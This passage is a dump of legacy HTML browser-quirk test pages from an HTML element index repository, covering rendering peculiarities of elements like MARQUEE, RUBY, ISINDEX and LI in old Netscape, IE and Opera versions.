    8 | This document has no HTML, HEAD or BODY elements 9 | 10 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/h/html-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | HTML: Browser peculiarity - Applying CSS to the HTML element in Mozilla 6 | 7 | 8 | 9 | 10 | Assertion:
    11 |
    Netscape 6, Beta 1 did not support CSS attached via the HTML element. 12 | This was fixed in N6B2 and above.
    13 | 14 |

    15 | This document has CSS applied to the HTML element (style="background-color: green; color: yellow;"). 16 | If the background is green the test passes. 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/i-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: I element 6 | 7 | 8 | 9 | 10 |

    Code example: I element

    11 | 12 |
    13 | filler text italicized text filler text 14 |
    15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/iframetest.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IFRAME test Document 6 | 7 | 8 | 9 | 10 |
    11 | Filler text Filler text Filler text Filler text Filler text Filler text 12 | Filler text Filler text Filler text Filler text Filler text Filler text 13 | Filler text Filler text Filler text Filler text Filler text Filler text 14 | Filler text Filler text Filler text Filler text Filler text Filler text 15 | Filler text Filler text Filler text Filler text Filler text Filler text 16 | Filler text Filler text Filler text Filler text Filler text Filler text 17 |
    18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/img-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IMG: Browser Peculiarities: Alternate form - LOWSRC dimensions affect SRC dimensions 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Netscape does not seem to adjust the dimensions of an image 15 | if a LOWSRC attribute is also supplied, ie: The dimensions of the LOWSRC image 16 | are used to render the SRC image if no other HEIGHT and WIDTH properties have been set.
    17 |
    18 | 19 | Reference Image (zenpattern.gif), default size: 20 |
    21 | filler text 22 | 23 | filler text 24 |
    25 |
    26 | 27 | Reference Image (right.gif), default size: 28 |
    29 | filler text 30 | 31 | filler text 32 |
    33 |
    34 | 35 | Test case with right.gif as the LOWSRC, and zenpattern.gif as the SRC. 36 | Dimensions of the image are different: 37 |
    38 | Click to see test case 39 |
    40 |
    41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/img-helper-lowsrc1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IMG LOWSRC test case 6 | 7 | 8 | 9 | 10 | Assertion: 11 |
    Netscape does not seem to adjust the dimensions of an image 12 | if a LOWSRC attribute is also supplied, ie: The dimensions of the LOWSRC image 13 | are used to render the SRC image if no other HEIGHT and WIDTH properties have been set.
    14 |
    15 | 16 | IMG reference, LOWSRC=right.gif; SRC=zenpattern.gif: 17 |
    18 | filler text 19 | 20 | filler text 21 |
    22 |
    23 | 24 | 25 | IMG reference, LOWSRC=right.gif; SRC=zenpattern.gif; width=200 height=200 set: 26 |
    27 | filler text 28 | 29 | filler text 30 |
    31 |
    32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/inputfile-bp4.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Input Type=File: Browser Peculiarities: Effects of the READONLY attribute 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Using a READONLY attribute in IE4 and IE5 on this element still 15 | allows a user to invoke the file...open dialog (from the "Browse..." button), although 16 | the text field is not directly editable. In IE5.5 plus, both the text field AND the 17 | file...open dialog are not usable.
    18 |
    19 | 20 | Plain Input Type=File field, no READONLY attribute: 21 |
    22 | filler text 23 |
    24 |
    25 |
    26 | filler text 27 |
    28 |
    29 | 30 | Input Type=File field, READONLY attribute present. 31 |
    32 | filler text 33 |
    34 |
    35 |
    36 | filler text 37 |
    38 |
    39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/ins-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | INS: Browser peculiarity - rendering effects in Mozilla 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    The CITE/DATETIME attributes are exposed in Netscape 6.1+ by 15 | invoking a context menu on the element (PC: right clicking) and choosing "properties."
    16 | The value of CITE for the test element below is: "#jan25-2001" and DATETIME is 17 | "2001-01-25T18:00:00PST"
    18 |
    19 | 20 |
    21 | filler text ins text filler text 22 |
    23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/ins-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: INS element 6 | 7 | 8 | 9 | 10 |

    Code example: INS element

    11 | 12 |
    13 | filler text Inserted text filler text 14 |
    15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/isindex-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ISINDEX: Browser Peculiarities: Event handling 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Opera 4.x: Assigning event handlers to this element will only 15 | trigger on the isindex surrounding area, NOT the ISINDEX text input field - 16 | this seems like incorrect behavior to me.
    17 |
    18 | 19 | Simple ISINDEX element, no event attributes: 20 |
    21 | filler text filler text 22 |
    23 |
    24 | 25 | Simple ISINDEX element, event attributes attached (onclick, onkeyup): 26 |
    27 | filler text filler text 28 |
    29 |
    30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/isindex-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ISINDEX: Browser Peculiarities: Sending data via POST 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    In Netscape 1.0-4.x, when data is sent via POST, it is sent 15 | as a name/value pair (exactly like it is done with normal forms.) 16 | The data is sent as: The ISINDEX value is what is entered by the user, and the 17 | variable name it is assigned to is "isindex." If the GET method is used, the 18 | value is the only data that is sent.
    19 |
    20 | 21 | Clicking on the link will generate the ISINDEX test case. Click on the link, 22 | type some text in the isindex box and hit the enter key. 23 |
    24 | Generate 25 | ISINDEX with METHOD=post 26 |
    27 |
    28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/i/isindex-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ISINDEX: Browser Peculiarities: Default METHOD of sending data 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    The default method for sending ISINDEX data is via the GET method 15 | (the data is appended to a URL as an argument.)
    16 |
    17 | 18 | Clicking on the link will generate the ISINDEX test case. Click on the link, 19 | type some text in the isindex box and hit the enter key. 20 |
    21 | Generate 22 | plain ISINDEX case 23 |
    24 |
    25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/k/kbd-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: KBD element 6 | 7 | 8 | 9 | 10 |

    Code example: KBD element

    11 | 12 |
    13 | filler text text entered from the keyboard filler text 14 |
    15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/legend-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LEGEND: Browser Peculiarities: Rendering in early Mozilla builds 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    In Netscape 6 Beta 1, a black bordered box was automatically 15 | placed around the LEGEND content (equivalent of using <legend STYLE="border: 2px solid black">). 16 | In later versions, no border box is applied.
    17 |
    18 | If the behavior is as described, both cases should look alike. 19 |
    20 | 21 |
    22 | Fieldset with normal LEGEND element: 23 |
    24 | filler text 25 |
    26 |
    27 | this is a legend 28 | 29 |
    30 |
    31 | filler text 32 |
    33 |
    34 | 35 |
    36 | Fieldset with LEGEND element having style="border: 2px solid black": 37 |
    38 | filler text 39 |
    40 |
    41 | this is a legend 42 | 43 |
    44 |
    45 | filler text 46 |
    47 |
    48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/legend-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LEGEND: Browser Peculiarities: Focus issues with ACCESSKEY attribute 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Use of the ACCESSKEY attribute for this element in IE 4.0 puts 15 | focus on the first form field within the parent FIELDSET. 16 |
    17 | To activate ACCESSKEY: 18 |
      19 |
    • IE/Moz: ALT + accesskey character 20 |
    • Opera: SHIFT-ESC + accesskey character 21 |
    22 |
    23 | 24 | 25 | LEGEND element with accesskey="r". The third field has an accesskey "s" by comparison: 26 |
    27 | filler text 28 |
    29 |
    30 | This is a legend (r) 31 | Field 1:
    32 | Field 2:
    33 | Field 3(s): 34 |
    35 |
    36 | filler text 37 |
    38 |
    39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/li-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LI: Browser Peculiarities: Use of a list structure without LI sub-elements 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Internet Explorer, Mosaic and Netscape all produce the 15 | indenting behavior for the case of having no LI elements in a list context. 16 | No list markers are generated.
    17 | 18 |
    19 | Indentation of UL element content with no LI sub-element: 20 |
    21 | filler text 22 |
      23 | UL list content UL list content UL list content UL list content UL list content UL list content 24 |
    25 | filler text 26 |
    27 |
    28 | 29 |
    30 | Indentation of OL element content with no LI sub-element: 31 |
    32 | filler text 33 |
      34 | OL list content OL list content OL list content OL list content OL list content OL list content 35 |
    36 | filler text 37 |
    38 |
    39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/li-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LI: Browser Peculiarities: Treatment of "0" and negative values for VALUE attribute 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    VALUE attribute behavior for "0" and negative values: 15 |
      16 |
    • IE: (all) Value ignored 17 |
    • Netscape/Mozilla: (all) Both value types treated as "1" (default) 18 |
    • Opera 2.1-6.x: Value Ignored 19 |
    • Opera 7.x+: "0" honored; negative values cause no marker to be rendered on that LI or any thereafter. 20 |
    21 |
    22 | 23 | OL list with 2nd LI VALUE="5": 24 |
    25 | filler text
    1. LI item 1
    2. LI item 2
    3. LI item 3
    filler text 26 |
    27 | 28 |
    29 | OL list with 2nd LI VALUE="0": 30 |
    31 | filler text
    1. LI item 1
    2. LI item 2
    3. LI item 3
    filler text 32 |
    33 | 34 |
    35 | OL list with 2nd LI VALUE="-5": 36 |
    37 | filler text
    1. LI item 1
    2. LI item 2
    3. LI item 3
    filler text 38 |
    39 |
    40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/link-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LINK: Browser Peculiarities: Multiple LINK element blocks 6 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | Assertion: 16 |
    IE 3.0 only allowed for a single LINK or STYLE block. 17 | Only the last one specified in the document is used. 18 | IE 4.0 and above, Netscape and Opera merge/cascade multiple STYLE elements.
    19 |
    20 | 21 | Simple DIV element with id="test1". First external CSS specifies "color: green" for this element. 22 |
    23 | filler text 24 |
    This is a div
    25 | filler text 26 |
    27 |
    28 | 29 | Simple DIV element with id="test2". Second external CSS specifies "color: green" for this element. 30 |
    31 | filler text 32 |
    This is a div
    33 | filler text 34 |
    35 |
    36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/link-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LINK: Browser Peculiarities: LINK elements with ID ignored in Netscape 4.x 6 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | Assertion: 16 |
    Netscape 4.x ignores a LINKed stylesheet if the LINK element has an ID attribute.
    17 |
    18 | 19 | Simple DIV element with id="test1". First external CSS specifies 20 | "background-color: green; text-transform: uppercase;" for this element.
    21 | LINK element does not have ID attribute
    22 |
    23 | filler text 24 |
    This is a div
    25 | filler text 26 |
    27 |
    28 | 29 | Simple DIV element with id="test2". Second external CSS specifies 30 | "background-color: green; text-transform: uppercase;" for this element.
    31 | LINK element has an ID attribute
    32 |
    33 | filler text 34 |
    This is a div
    35 | filler text 36 |
    37 |
    38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/listing-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LISTING: Browser Peculiarities: 132 character line length 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Netscape is the only browser that complies with the 132 character line length.
    15 | 16 |
    17 | Using LISTING element: 18 |
    19 | filler text 20 | 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 21 | filler text 22 |
    23 |
    24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/l/listing-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | LISTING: Browser Peculiarities: Displaying all characters literally 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Mosaic is the only browser to display all characters literally.
    15 | 16 |
    17 | Using LISTING element: 18 |
    19 | filler text 20 | listing NESTED BOLD ELEMENT, character entity: & listing 21 | filler text 22 |
    23 |
    24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/marquee-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MARQUEE: Browser Peculiarities: block versus inline marquees 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    If no WIDTH attribute is set for a MARQUEE element, it behaves like a 15 | block-level element (linebreak before and after) and occupies 100% of the containing 16 | element/window width. If a width is set, it behaves like an in-line element.
    17 |
    18 | 19 | Basic MARQUEE element, no width: 20 |
    21 | filler text 22 | Marquee1 Marquee2 23 | filler text 24 |
    25 |
    26 | 27 | Basic MARQUEE element, width=500: 28 |
    29 | filler text 30 | Marquee1 Marquee2 31 | filler text 32 |
    33 |
    34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/marquee-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MARQUEE: Browser Peculiarities: Nested Marquee 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Nested MARQUEE elements do not behave well in Internet Explorer. 15 | Don't try it.
    16 |
    17 | 18 | Basic nested MARQUEE elements, no widths on each. Green background on outer, yellow on inner: 19 |
    20 | filler text 21 | outerMarquee innerMarquee outerMarquee 22 | filler text 23 |
    24 |
    25 | 26 | Basic nested MARQUEE elements, width=500 on each. Green background on outer, yellow on inner: 27 |
    28 | filler text 29 | outerMarquee 30 | innerMarquee outerMarquee 31 | filler text 32 |
    33 |
    34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/marquee-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MARQUEE: Browser Peculiarities: Block structures in Marquee 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    The use of block structures in MARQUEEs (such as BLOCKQUOTE) 15 | will be ignored in IE versions 3.0x and below, while in IE 4.0 and above it makes 16 | the marquee appear as a multi-line field.
    17 |
    18 | 19 | Basic MARQUEE element, no width. Span nested inside: 20 |
    21 | filler text 22 | Marquee innerSpan Marquee 23 | filler text 24 |
    25 |
    26 | 27 | Basic MARQUEE element, no width. Blockquote nested inside: 28 |
    29 | filler text 30 | Marquee
    Blockquote
    Marquee
    31 | filler text 32 |
    33 |
    34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/marquee-bp4.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MARQUEE: Browser Peculiarities: width of marquees in table cells 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Scenario: MARQUEE is the only content of a table cell and 15 | WIDTH attribute is not set for EITHER the table cell or MARQUEE element:
    16 | Internet Explorer 4.0 and above - cell width defaults to 1 pixel.
    17 | Internet Explorer 2.0/3.0 - cell width defaults to the width of the MARQUEE content.
    18 |
    19 | 20 | Basic MARQUEE element ("Marquee text") in cell 1, no width.: 21 |
    22 | filler text 23 | 24 | 25 |
    Marquee textcell 2
    26 | filler text 27 |
    28 |
    29 | 30 | Basic MARQUEE element ("Marquee text") in cell 1, width=200.: 31 |
    32 | filler text 33 | 34 | 35 |
    Marquee textcell 2
    36 | filler text 37 |
    38 |
    39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/marquee-bp5.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MARQUEE: Browser Peculiarities: BEHAVIOR=ALTERNATE attribute behavior 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Netscape 7.0+: For the BEHAVIOR attribute, the ALTERNATE value 15 | is rendered differently than IE - In IE, the marquee starts at one side of the 16 | marquee box, already onscreen. It then proceeds to the opposite side of the marquee 17 | box, until its leading content edge reaches the marquee box edge, and then returns 18 | back the way it came. In Mozilla, the marquee content starts offscreen, comes 19 | onscreen at one side, travels to the opposite side, then goes offscreen before travelling 20 | back the way it came.
    21 |
    22 | 23 | Basic MARQUEE element, no width.: 24 |
    25 | filler text 26 | Marquee 27 | filler text 28 |
    29 |
    30 | 31 | Basic MARQUEE element, no width, behavior=alternate.: 32 |
    33 | filler text 34 | Marquee 35 | filler text 36 |
    37 |
    38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/menu-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MENU: Browser Peculiarities: Basic rendering compared to a UL list 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    The reviewed browsers make no distinction in display between a UL and a MENU list.
    15 |
    16 | 17 | Basic MENU list: 18 |
    19 | filler text 20 | 21 |
  • LI item 1 22 |
  • LI item 2 23 |
  • LI item 3 24 |
  • 25 | filler text 26 |
    27 |
    28 | 29 | Basic UL list: 30 |
    31 | filler text 32 |
      33 |
    • LI item 1 34 |
    • LI item 2 35 |
    • LI item 3 36 |
    37 | filler text 38 |
    39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/m/menu-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | MENU: Browser Peculiarities: Indentation when LIs are closed and not closed 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Netscape 6 Beta 1 had a bug with MENU lists: Unless LI elements 15 | in the menu list were explicitly closed (they should be optional), the menu 16 | indentation level was maintained for the rest of the document. This behavior was fixed in 6.0 Beta 2.
    17 |
    18 | 19 | Basic MENU list with closing LI elements: 20 |
    21 | filler text 22 | 23 |
  • LI item 1
  • 24 |
  • LI item 2
  • 25 |
  • LI item 3
  • 26 |
    27 | filler text 28 |
    29 |
    30 | 31 | Basic MENU list with no closing LI elements: 32 |
    33 | filler text 34 | 35 |
  • LI item 1 36 |
  • LI item 2 37 |
  • LI item 3 38 |
  • 39 | filler text 40 |
    41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/n/nobr-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: NOBR element 6 | 7 | 8 | 9 | 10 |

    Code example: NOBR element

    11 | 12 |
    13 | filler text This is a run of nobreak text to be used as an example This is a run of nobreak text to be used as an example 14 | This is a run of nobreak text to be used as an example This is a run of nobreak text to be used as an example 15 | This is a run of nobreak text to be used as an example This is a run of nobreak text to be used as an example filler text 16 |
    17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/o/ol-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | OL: Browser Peculiarities: Treatment of "0" and negative values for START attribute 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    START attribute behavior for "0" and negative values: 15 |
      16 |
    • IE: (all) Both value types honored 17 |
    • Netscape/Mozilla: (all) Ignored 18 |
    • Opera 2.1-6.x: Ignored 19 |
    • Opera 7.x+: "0" honored; negative values cause list markers to go away 20 |
    21 |
    22 | 23 | OL list with START="5": 24 |
    25 | filler text
    1. LI item 1
    2. LI item 2
    3. LI item 3
    filler text 26 |
    27 | 28 |
    29 | OL list with START="0": 30 |
    31 | filler text
    1. LI item 1
    2. LI item 2
    3. LI item 3
    filler text 32 |
    33 | 34 |
    35 | OL list with START="-5": 36 |
    37 | filler text
    1. LI item 1
    2. LI item 2
    3. LI item 3
    filler text 38 |
    39 |
    40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/p/plaintext-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | PLAINTEXT: Browser Peculiarities: Displaying all characters literally 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    15 |
      16 |
    1. All Opera versions, IE4+, and Netscape up to version 6.0 support the original 17 | PLAINTEXT specification which did not accept a closing tag. 18 |
    2. Internet Explorer up to version 3, Netscape 6.1+ and all Mosaic versions 19 | provide for a closing tag. A closing tag would allow placement in regions 20 | other than the end of a HTML document. 21 |
    22 |
    23 | 24 |
    25 | Plain PLAINTEXT element, with nested B element (It should be fairly evident if parsing stops beyond the end tag): 26 |
    27 | filler text 28 | plaintext <b>NESTED BOLD ELEMENT</b>, character entity: &amp; plaintext</plaintext> 29 | filler text 30 | <hr> 31 | <br> 32 | 33 | 34 | 35 | </body> 36 | </html> 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/q/q-bp1.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Q: Browser peculiarity - rendering effects in Mozilla</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">The CITE attribute is exposed in Netscape 6.1+ by invoking a 15 | context menu on the element (PC: right clicking) and choosing "properties."<br> 16 | The value of CITE for the test element below is: "http://www.example.com/qcitation.htm"</div> 17 | 18 | <br> 19 | <hr> 20 | filler text <q cite="http://www.example.com/qcitation.htm">Q text</q> filler text 21 | <hr> 22 | 23 | </body> 24 | </html> 25 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/q/q-bp2.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Q: Browser peculiarity - rendering effects in IE</title> 6 | <style> 7 | .assert { color: green } 8 | .test { color: yellow } 9 | #test1 { background-color: green } 10 | </style> 11 | </head> 12 | 13 | <body> 14 | 15 | <big><b><u>Assertions:</u></b></big> 16 | <div class="assert">IE 4+ supports this element, but only via its recognition. 17 | Common attributes will be applied to content, but nothing is done with the CITE 18 | attribute by the browser unless scripting is used to take action on its value.</div> 19 | 20 | <hr> 21 | <b>Test 1:</b><br> 22 | filler text 23 | <q>Plain Q element, no attributes</q> 24 | filler text 25 | <br><br> 26 | 27 | <b>Test 2:</b><br> 28 | filler text 29 | <q class="test" id="test1" style="word-spacing: 20px" title="this is a title">Q 30 | element, with class="test" (Gray color), id="test1" (green background), 31 | style ("word-spacing: 20px"), and title ("this is a title" on hover) attributes</q> 32 | filler text 33 | <hr> 34 | 35 | </body> 36 | </html> 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/r/rt-bp2.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>RT: Browser Peculiarities: Placement of RT within RUBY element</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">IE: If RT content exists before the RB element, the RT content 15 | is rendered small, but inline before the RB content.</div> 16 | <br> 17 | 18 | <b>Plain RUBY element, default RT occurs after RB:</b> 19 | <hr> 20 | filler text 21 | <ruby> 22 | <rb>HTML</rb> 23 | <rt>HyperText Markup Language</rt> 24 | </ruby> 25 | filler text 26 | <hr> 27 | <br> 28 | 29 | <b>Plain RUBY element, default RT occurs before RB:</b> 30 | <hr> 31 | filler text 32 | <ruby> 33 | <rt>HyperText Markup Language</rt> 34 | <rb>HTML</rb> 35 | </ruby> 36 | filler text 37 | <hr> 38 | <br> 39 | 40 | </body> 41 | </html> 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/r/ruby-bp1.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>RUBY: Browser Peculiarities: RT rendering in IE</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">IE: If RT content exists before the RUBY content, the RT content 15 | is rendered small, but inline before the RUBY content.</div> 16 | <br> 17 | 18 | <b>Simple RUBY element, RB followed by RT element:</b> 19 | <hr> 20 | filler text 21 | <ruby> 22 | <rb>RUBY</rb> 23 | <rt>Really Ugly Brown Yarn</rt> 24 | </ruby> 25 | filler text 26 | <hr> 27 | <br> 28 | 29 | <b>Simple RUBY element, plain text (RB implied), followed by RT element:</b> 30 | <hr> 31 | filler text 32 | <ruby> 33 | RUBY 34 | <rt>Really Ugly Brown Yarn</rt> 35 | </ruby> 36 | filler text 37 | <hr> 38 | <br> 39 | 40 | <b>Simple RUBY element, RT followed by RB element:</b> 41 | <hr> 42 | filler text 43 | <ruby> 44 | <rt>Really Ugly Brown Yarn</rt> 45 | <rb>RUBY</rb> 46 | </ruby> 47 | filler text 48 | <hr> 49 | <br> 50 | 51 | </body> 52 | </html> 53 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/r/ruby-bp2.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>RUBY: Browser Peculiarities: Element content rendering - Block elements</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">IE 5+: While Block elements can exist within a Ruby element, 15 | some interesting behaviors are apparent. Images render fine also, but not form widgets.</div> 16 | <br> 17 | 18 | <b>Simple RUBY element, text-only content:</b> 19 | <hr> 20 | filler text 21 | <ruby> 22 | <rb>RUBY</rb> 23 | <rt>Really Ugly Brown Yarn</rt> 24 | </ruby> 25 | filler text 26 | <hr> 27 | <br> 28 | 29 | <b>Plain markup: Blockquote ("Ugly Brown")</b> 30 | <hr> 31 | filler text 32 | <blockquote>Ugly Brown</blockquote> 33 | filler text 34 | <hr> 35 | <br> 36 | 37 | <b>Simple RUBY element, RT=("Really Ugly Brown Yarn"), blockquote content is "Ugly Brown") in RT:</b> 38 | <hr> 39 | filler text 40 | <ruby> 41 | <rb>RUBY</rb> 42 | <rt>Really <blockquote>Ugly Brown</blockquote> Yarn</rt> 43 | </ruby> 44 | filler text 45 | <hr> 46 | <br> 47 | 48 | </body> 49 | </html> 50 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/r/ruby-bp3.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>RUBY: Browser Peculiarities: Element content rendering - Images</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">IE 5+: While Block elements can exist within a Ruby element, 15 | some interesting behaviors are apparent. Images render fine also, but not form widgets.</div> 16 | <br> 17 | 18 | <b>Simple RUBY element, text-only content:</b> 19 | <hr> 20 | filler text 21 | <ruby> 22 | <rb>RUBY</rb> 23 | <rt>Really Ugly Brown Yarn</rt> 24 | </ruby> 25 | filler text 26 | <hr> 27 | <br> 28 | 29 | <b>Plain markup: IMG element (crosshair.gif)</b> 30 | <hr> 31 | filler text 32 | <img src="../../../objects/crosshair.gif"> 33 | filler text 34 | <hr> 35 | <br> 36 | 37 | <b>Simple RUBY element, RT=("Really Ugly Brown Yarn"), IMG element between "Ugly" and "Brown":</b> 38 | <hr> 39 | filler text 40 | <ruby> 41 | <rb>RUBY</rb> 42 | <rt>Really Ugly <img src="../../../objects/crosshair.gif"> Brown Yarn</rt> 43 | </ruby> 44 | filler text 45 | <hr> 46 | <br> 47 | 48 | </body> 49 | </html> 50 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/s-example.htm: 